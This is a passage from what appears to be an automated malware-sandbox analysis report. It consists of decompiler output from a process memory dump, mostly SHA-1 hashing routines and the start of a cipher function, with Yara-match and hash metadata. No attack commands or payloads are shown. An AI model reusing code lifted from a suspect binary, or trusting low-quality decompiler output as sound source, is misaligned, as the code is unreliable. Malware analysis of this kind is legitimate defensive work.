					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































            0x00409e4b
            0x00409e4f
            0x00409e51
            0x00409e51
            0x00409e54
            0x00409e76
            0x00409e9c
            0x00409ec2
            0x00409ee4
            0x00409eeb
            0x00409eee
            0x00409ef1
            0x00409efa
            0x00409f00
            0x00409f07
            0x00409f18
            0x00409f1b
            0x00409f1e
            0x00409f22
            0x00409f24
            0x00409f26
            0x00409f2f
            0x00409f32
            0x00409f35
            0x00409f40
            0x00409f46
            0x00409f48
            0x00409f48
            0x00409f4b
            0x00409f4e
            0x00409f4e
            0x00409f53
            0x00409f55
            0x00409f58
            0x00409f5b
            0x00409f61
            0x00409f64
            0x00409f67
            0x00409f70
            0x00409f76
            0x00409f7f
            0x00409f8e
            0x00409f95
            0x00409f98
            0x00409f9b
            0x00409fa4
            0x00409fa7
            0x00409faa
            0x00409fc2
            0x00409fc9
            0x00409fcb
            0x00409fce
            0x00409fd1
            0x00409fda
            0x00409fe1
            0x00409fe4
            0x00409fe7
            0x00409ff6
            0x00409ffd
            0x0040a000
            0x0040a003
            0x0040a00c
            0x0040a016
            0x0040a019
            0x0040a025
            0x0040a028
            0x0040a02f
            0x0040a032
            0x0040a035
            0x0040a03a
            0x0040a03d
            0x0040a046
            0x0040a057
            0x0040a05a
            0x0040a05d
            0x0040a064
            0x0040a067
            0x0040a06a
            0x0040a06d
            0x0040a06f
            0x0040a072
            0x0040a075
            0x0040a07e
            0x0040a083
            0x0040a083
            0x0040a098
            0x0040a09b
            0x0040a09e
            0x0040a0a5
            0x0040a0a8
            0x0040a0ab
            0x0040a0c0
            0x0040a0c7
            0x0040a0ca
            0x0040a0ce
            0x0040a0d1
            0x0040a0d6
            0x0040a0d9
            0x0040a0e8
            0x0040a0eb
            0x0040a0f2
            0x0040a0f5
            0x0040a0f8
            0x0040a0fb
            0x0040a0fe
            0x0040a106
            0x0040a114
            0x0040a117
            0x0040a11a
            0x0040a11a
            0x0040a121
            0x0040a124
            0x0040a127
            0x0040a12f
            0x0040a13d
            0x0040a140
            0x0040a147
            0x0040a14a
            0x0040a14d
            0x0040a150
            0x0040a153
            0x0040a15c
            0x0040a163
            0x0040a163
            0x0040a169
            0x0040a182
            0x0040a185
            0x0040a18c
            0x0040a18f
            0x0040a192
            0x0040a1a4
            0x0040a1ae
            0x0040a1b1
            0x0040a1ba
            0x0040a1bd
            0x0040a1c4
            0x0040a1c7
            0x0040a1cd
            0x0040a1e0
            0x0040a1e7
            0x0040a1ea
            0x0040a1ed
            0x0040a1f0
            0x0040a1f9
            0x0040a1fc
            0x0040a20f
            0x0040a212
            0x0040a21c
            0x0040a21f
            0x0040a221
            0x0040a22a
            0x0040a22d
            0x0040a240
            0x0040a246
            0x0040a249
            0x0040a250
            0x0040a252
            0x0040a255
            0x0040a258
            0x0040a25b
            0x0040a25e
            0x0040a261
            0x0040a26a
            0x0040a26f
            0x0040a272
            0x0040a272
            0x0040a285
            0x0040a288
            0x0040a28b
            0x0040a292
            0x0040a295
            0x0040a298
            0x0040a29b
            0x0040a2ae
            0x0040a2b1
            0x0040a2bc
            0x0040a2bf
            0x0040a2cb
            0x0040a2ce
            0x0040a2d4
            0x0040a2d7
            0x0040a2da
            0x0040a2e1
            0x0040a2f1
            0x0040a2f4
            0x0040a2fa
            0x0040a2fd
            0x0040a304
            0x0040a306
            0x0040a309
            0x0040a30c
            0x0040a30f
            0x0040a312
            0x0040a319
            0x0040a328
            0x0040a32b
            0x0040a332
            0x0040a335
            0x0040a338
            0x0040a33b
            0x0040a33e
            0x0040a341
            0x0040a344
            0x0040a34d
            0x0040a35e
            0x0040a366
            0x0040a36c
            0x0040a36f
            0x0040a371
            0x0040a374
            0x0040a377
            0x0040a384

            Strings
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID: (
            • API String ID: 0-3887548279
            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
            • Instruction ID: 761c4a68b585b28a38f9816625c1c2cc86ae2b6e7acc08c6d3f539b6cea400a7
            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
            • Instruction Fuzzy Hash: 6C022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00409E3C, Relevance: 1.7, Strings: 1, Instructions: 422COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 73%
            			E00409E3C(void* __edx, void* __edi, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t279;
				signed int* _t280;
				signed int _t281;
				signed int _t287;
				signed int _t290;
				signed int _t294;
				signed int _t297;
				signed int _t301;
				signed int _t305;
				signed int _t307;
				signed int _t313;
				signed int _t321;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				signed int _t337;
				signed int _t343;
				signed int _t344;
				signed int _t349;
				signed int _t358;
				signed int _t362;
				signed int _t363;
				signed int _t367;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t405;
				signed int _t410;
				signed int _t416;
				signed int _t419;
				signed int _t426;
				signed int _t429;
				signed int _t438;
				signed int _t440;
				signed int _t443;
				signed int _t451;
				signed int _t466;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t477;
				signed int _t485;
				signed int _t486;
				signed int* _t487;
				signed int* _t490;
				signed int _t497;
				signed int _t500;
				signed int _t505;
				signed int _t508;
				signed int _t511;
				signed int _t514;
				signed int _t515;
				signed int _t519;
				signed int _t531;
				signed int _t534;
				signed int _t541;
				void* _t547;
				void* _t549;

				_t547 = _t549;
				_t490 = _a4;
				_t358 = 0;
				_t4 =  &(_t490[7]); // 0x1b
				_t279 = _t4;
				do {
					 *(_t547 + _t358 * 4 - 0x14c) = ((( *(_t279 - 1) & 0x000000ff) << 0x00000008 |  *_t279 & 0x000000ff) << 0x00000008 | _t279[1] & 0x000000ff) << 0x00000008 | _t279[2] & 0x000000ff;
					 *(_t547 + _t358 * 4 - 0x148) = (((_t279[3] & 0x000000ff) << 0x00000008 | _t279[4] & 0x000000ff) << 0x00000008 | _t279[5] & 0x000000ff) << 0x00000008 | _t279[6] & 0x000000ff;
					 *(_t547 + _t358 * 4 - 0x144) = (((_t279[7] & 0x000000ff) << 0x00000008 | _t279[8] & 0x000000ff) << 0x00000008 | _t279[9] & 0x000000ff) << 0x00000008 | _t279[0xa] & 0x000000ff;
					 *(_t547 + _t358 * 4 - 0x140) = (((_t279[0xb] & 0x000000ff) << 0x00000008 | _t279[0xc] & 0x000000ff) << 0x00000008 | _t279[0xd] & 0x000000ff) << 0x00000008 | _t279[0xe] & 0x000000ff;
					_t358 = _t358 + 4;
					_t279 =  &(_t279[0x10]);
				} while (_t358 < 0x10);
				_t280 =  &_v304;
				_v8 = 0x10;
				do {
					_t405 =  *(_t280 - 0x18);
					_t466 =  *(_t280 - 0x14);
					_t362 =  *(_t280 - 0x20) ^ _t280[5] ^  *_t280 ^ _t405;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t280[9] =  *(_t280 - 0x1c) ^ _t280[6] ^ _t280[1] ^ _t466;
					_t280[8] = _t362;
					_t321 = _t280[7] ^  *(_t280 - 0x10) ^ _t280[2];
					_t280 =  &(_t280[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t48 =  &_v8;
					 *_t48 = _v8 - 1;
					_t280[6] = _t321 ^ _t405;
					_t280[7] =  *(_t280 - 0x1c) ^  *(_t280 - 4) ^ _t362 ^ _t466;
				} while ( *_t48 != 0);
				_t323 =  *_t490;
				_t281 = _t490[1];
				_t363 = _t490[2];
				_t410 = _t490[3];
				_v12 = _t323;
				_v16 = _t490[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t469 = _v8;
					_t497 = _t323 + ( !_t281 & _t410 | _t363 & _t281) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t326 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t410;
					_v12 = _t497;
					asm("rol esi, 0x5");
					_v8 = _t363;
					_t416 = _t497 + ( !_t326 & _t363 | _t281 & _t326) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t500 = _t281;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t367 = _v12;
					_v8 = _t326;
					_t328 = _v8;
					_v12 = _t416;
					asm("rol edx, 0x5");
					_t287 = _t416 + ( !_t367 & _t500 | _t326 & _t367) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t419 = _v12;
					_v16 = _t500;
					asm("ror ecx, 0x2");
					_v8 = _t367;
					_v12 = _t287;
					asm("rol eax, 0x5");
					_v16 = _t328;
					_t505 = _t287 + ( !_t419 & _t328 | _t367 & _t419) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t363 = _v12;
					_t290 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t419;
					_v12 = _t505;
					asm("rol esi, 0x5");
					_v16 = _t290;
					_t281 = _v12;
					_t508 = _t505 + ( !_t363 & _t290 | _t419 & _t363) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t410 = _v8;
					asm("ror ecx, 0x2");
					_t470 = _t469 + 5;
					_t323 = _t508;
					_v12 = _t323;
					_v8 = _t470;
				} while (_t470 < 0x14);
				_t471 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t410;
					_t511 = _t508 + (_t410 ^ _t363 ^ _t281) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t337 = _v12;
					_v12 = _t511;
					asm("rol esi, 0x5");
					_t426 = _t511 + (_t363 ^ _t281 ^ _t337) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t514 = _t281;
					_v16 = _t363;
					_t370 = _v12;
					_v12 = _t426;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t294 = _t426 + (_t281 ^ _t337 ^ _t370) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t429 = _v12;
					_v8 = _t337;
					_v8 = _t370;
					_v12 = _t294;
					asm("rol eax, 0x5");
					_t471 = _t471 + 5;
					_t363 = _v12;
					asm("ror edx, 0x2");
					_t148 = _t514 + 0x6ed9eba1; // 0x6ed9eb9f
					_t515 = _t294 + (_t337 ^ _v8 ^ _t429) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x154)) + _t148;
					_t297 = _v8;
					_v8 = _t429;
					_v12 = _t515;
					asm("rol esi, 0x5");
					_t410 = _v8;
					_t508 = _t515 + (_t297 ^ _v8 ^ _t363) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x150)) + _t337 + 0x6ed9eba1;
					_v16 = _t297;
					_t281 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t508;
				} while (_t471 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t410;
					asm("ror eax, 0x2");
					_t519 = ((_t363 | _t281) & _t410 | _t363 & _t281) +  *((intOrPtr*)(_t547 + _v8 * 4 - 0x14c)) + _t508 + _v16 - 0x70e44324;
					_t477 = _v12;
					_v12 = _t519;
					asm("rol esi, 0x5");
					_t343 = _v8;
					asm("ror edi, 0x2");
					_t438 = ((_t281 | _t477) & _t363 | _t281 & _t477) +  *((intOrPtr*)(_t547 + _t343 * 4 - 0x148)) + _t519 + _v16 - 0x70e44324;
					_v16 = _t363;
					_t374 = _v12;
					_v12 = _t438;
					asm("rol edx, 0x5");
					_v8 = _t281;
					_t440 = ((_t477 | _t374) & _t281 | _t477 & _t374) +  *((intOrPtr*)(_t547 + _t343 * 4 - 0x144)) + _t438 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t301 = _v12;
					_v8 = _t477;
					_v12 = _t440;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t531 = ((_t374 | _t301) & _t477 | _t374 & _t301) +  *((intOrPtr*)(_t547 + _t343 * 4 - 0x140)) + _t440 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t443 = _t374;
					_t363 = _v12;
					_v8 = _t443;
					_v12 = _t531;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t508 = ((_t301 | _t363) & _t443 | _t301 & _t363) +  *((intOrPtr*)(_t547 + _t343 * 4 - 0x13c)) + _t531 + _v16 - 0x70e44324;
					_t410 = _t301;
					_t281 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t508;
					_t344 = _t343 + 5;
					_v8 = _t344;
				} while (_t344 < 0x3c);
				_t485 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t486 = _v8;
					asm("ror eax, 0x2");
					_t534 = (_t410 ^ _t363 ^ _t281) +  *((intOrPtr*)(_t547 + _t485 * 4 - 0x14c)) + _t508 + _v16 - 0x359d3e2a;
					_t349 = _v12;
					_v16 = _t410;
					_v12 = _t534;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t451 = (_t363 ^ _t281 ^ _t349) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x148)) + _t534 + _v16 - 0x359d3e2a;
					_v16 = _t363;
					_t375 = _v12;
					_v12 = _t451;
					asm("rol edx, 0x5");
					_v16 = _t281;
					asm("ror ecx, 0x2");
					_t305 = (_t281 ^ _t349 ^ _t375) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x144)) + _t451 + _v16 - 0x359d3e2a;
					_t410 = _v12;
					_v12 = _t305;
					asm("rol eax, 0x5");
					_v16 = _t349;
					_t541 = (_t349 ^ _t375 ^ _t410) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x140)) + _t305 + _v16 - 0x359d3e2a;
					_t307 = _t375;
					_v8 = _t349;
					asm("ror edx, 0x2");
					_v8 = _t375;
					_t363 = _v12;
					_v12 = _t541;
					asm("rol esi, 0x5");
					_t485 = _t486 + 5;
					_t508 = (_t307 ^ _t410 ^ _t363) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x13c)) + _t541 + _v16 - 0x359d3e2a;
					_v16 = _t307;
					_t281 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t410;
					_v12 = _t508;
					_v8 = _t485;
				} while (_t485 < 0x50);
				_t487 = _a4;
				_t487[2] = _t487[2] + _t363;
				_t487[3] = _t487[3] + _t410;
				_t313 = _t487[4] + _v16;
				 *_t487 =  *_t487 + _t508;
				_t487[1] = _t487[1] + _t281;
				_t487[4] = _t313;
				_t487[0x17] = 0;
				return _t313;
			}

































































            0x00409e41
            0x00409e4b
            0x00409e4f
            0x00409e51
            0x00409e51
            0x00409e54
            0x00409e76
            0x00409e9c
            0x00409ec2
            0x00409ee4
            0x00409eeb
            0x00409eee
            0x00409ef1
            0x00409efa
            0x00409f00
            0x00409f07
            0x00409f18
            0x00409f1b
            0x00409f1e
            0x00409f22
            0x00409f24
            0x00409f26
            0x00409f2f
            0x00409f32
            0x00409f35
            0x00409f40
            0x00409f46
            0x00409f48
            0x00409f48
            0x00409f4b
            0x00409f4e
            0x00409f4e
            0x00409f53
            0x00409f55
            0x00409f58
            0x00409f5b
            0x00409f61
            0x00409f64
            0x00409f67
            0x00409f70
            0x00409f76
            0x00409f7f
            0x00409f8e
            0x00409f95
            0x00409f98
            0x00409f9b
            0x00409fa4
            0x00409fa7
            0x00409faa
            0x00409fc2
            0x00409fc9
            0x00409fcb
            0x00409fce
            0x00409fd1
            0x00409fda
            0x00409fe1
            0x00409fe4
            0x00409fe7
            0x00409ff6
            0x00409ffd
            0x0040a000
            0x0040a003
            0x0040a00c
            0x0040a016
            0x0040a019
            0x0040a025
            0x0040a028
            0x0040a02f
            0x0040a032
            0x0040a035
            0x0040a03a
            0x0040a03d
            0x0040a046
            0x0040a057
            0x0040a05a
            0x0040a05d
            0x0040a064
            0x0040a067
            0x0040a06a
            0x0040a06d
            0x0040a06f
            0x0040a072
            0x0040a075
            0x0040a07e
            0x0040a083
            0x0040a083
            0x0040a098
            0x0040a09b
            0x0040a09e
            0x0040a0a5
            0x0040a0a8
            0x0040a0ab
            0x0040a0c0
            0x0040a0c7
            0x0040a0ca
            0x0040a0ce
            0x0040a0d1
            0x0040a0d6
            0x0040a0d9
            0x0040a0e8
            0x0040a0eb
            0x0040a0f2
            0x0040a0f5
            0x0040a0f8
            0x0040a0fb
            0x0040a0fe
            0x0040a106
            0x0040a114
            0x0040a117
            0x0040a11a
            0x0040a11a
            0x0040a121
            0x0040a124
            0x0040a127
            0x0040a12f
            0x0040a13d
            0x0040a140
            0x0040a147
            0x0040a14a
            0x0040a14d
            0x0040a150
            0x0040a153
            0x0040a15c
            0x0040a163
            0x0040a163
            0x0040a169
            0x0040a182
            0x0040a185
            0x0040a18c
            0x0040a18f
            0x0040a192
            0x0040a1a4
            0x0040a1ae
            0x0040a1b1
            0x0040a1ba
            0x0040a1bd
            0x0040a1c4
            0x0040a1c7
            0x0040a1cd
            0x0040a1e0
            0x0040a1e7
            0x0040a1ea
            0x0040a1ed
            0x0040a1f0
            0x0040a1f9
            0x0040a1fc
            0x0040a20f
            0x0040a212
            0x0040a21c
            0x0040a21f
            0x0040a221
            0x0040a22a
            0x0040a22d
            0x0040a240
            0x0040a246
            0x0040a249
            0x0040a250
            0x0040a252
            0x0040a255
            0x0040a258
            0x0040a25b
            0x0040a25e
            0x0040a261
            0x0040a26a
            0x0040a26f
            0x0040a272
            0x0040a272
            0x0040a285
            0x0040a288
            0x0040a28b
            0x0040a292
            0x0040a295
            0x0040a298
            0x0040a29b
            0x0040a2ae
            0x0040a2b1
            0x0040a2bc
            0x0040a2bf
            0x0040a2cb
            0x0040a2ce
            0x0040a2d4
            0x0040a2d7
            0x0040a2da
            0x0040a2e1
            0x0040a2f1
            0x0040a2f4
            0x0040a2fa
            0x0040a2fd
            0x0040a304
            0x0040a306
            0x0040a309
            0x0040a30c
            0x0040a30f
            0x0040a312
            0x0040a319
            0x0040a328
            0x0040a32b
            0x0040a332
            0x0040a335
            0x0040a338
            0x0040a33b
            0x0040a33e
            0x0040a341
            0x0040a344
            0x0040a34d
            0x0040a35e
            0x0040a366
            0x0040a36c
            0x0040a36f
            0x0040a371
            0x0040a374
            0x0040a377
            0x0040a384

            Strings
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID: (
            • API String ID: 0-3887548279
            • Opcode ID: 73dd2f901b922e6f06b93147fbaee9044beeb9fbcfd0c696aa987ac1f7b445f6
            • Instruction ID: 20804af030e5d2d51192468eb547024cdf3f7c9e85a8b02f3c82cc7c519a7834
            • Opcode Fuzzy Hash: 73dd2f901b922e6f06b93147fbaee9044beeb9fbcfd0c696aa987ac1f7b445f6
            • Instruction Fuzzy Hash: 36022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402FB0, Relevance: .4, Instructions: 435COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 26%
            			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
